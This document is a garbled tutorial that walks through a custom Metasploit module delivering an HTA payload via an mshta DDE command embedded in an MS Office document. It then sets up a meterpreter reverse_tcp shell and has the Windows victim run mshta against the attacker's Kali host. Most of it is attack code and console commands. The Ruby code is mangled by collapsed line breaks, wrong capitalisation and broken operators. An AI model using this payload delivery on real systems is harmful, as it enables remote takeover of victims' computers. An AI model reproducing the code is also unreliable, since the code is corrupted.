Kali System Preparation:
Copy the following Ruby code into the/USR/SHARE/METASPLOIT-FRAMEWORK/MODULES/EXPLOITS/WINDOWS/SMB/MSH_SHELL.RB directory (note the code indentation OH):
# # # This module requires metasploit:https://metasploit.com/download# current source:https://github.com/rapid7/ metasploit-framework## class Metasploitmodule < Msf::exploit::remote Rank = normalranking include Msf::exploit: : Remote::httpserver def initialize (info = {}) Super (Update_info (info, ' Name ' = ' Microsoft Office Payload D Elivery ', ' Description ' =%q{This module generates an command to place within a Word document, tha t when executed, would retrieve a HTA payload via HTTP from a Web server. Currently has not figured off how to generate a doc. }, ' License ' = + msf_license, ' Arch ' = arch_x86, ' Platform ' = ' win ', ' Targets ' [[' Automatic ', {}],], ' defaulttarget ' = 0,) ' End def On_request_uri (CLI, _request) Print_status ("Delivering payload") P = regenerate_payload (CLI) data = MSF::UTIL::EXE.TO_EXECUTABLE_FMT (Framewo RkArch_x86, ' win ', p.encoded, ' Hta-psh ', {: Arch = arch_x86,:p latform = ' Win '}) send_re Sponse (CLI, data, ' content-type ' = ' Application/hta ') end def primer url = Get_uri print_status ("Place the Following DDE in an MS document: ") print_line (" Mshta.exe \ "#{url}\" ") endend
To start the MSF service on the command line:
Service PostgreSQL Start
Start MSF again:
sudo msfconsole
Reload All modules:
Reload_all
Find the Msh_shell module we just created:
Search Msh_shell
Load this module:
Use Exploit/windows/smb/msh_shell
Using Bounce Shellcode, configure the native address, configure the URI address
set payload windows/meterpreter/reverse_tcpset192.168. 0.105 Set Uripath Aaaaexploit
Window System:
Open the Run command and execute:
Mshta http://Kali system ip/aaaa
The Kali system will receive a shell of the window system
Mshta Rebound Shell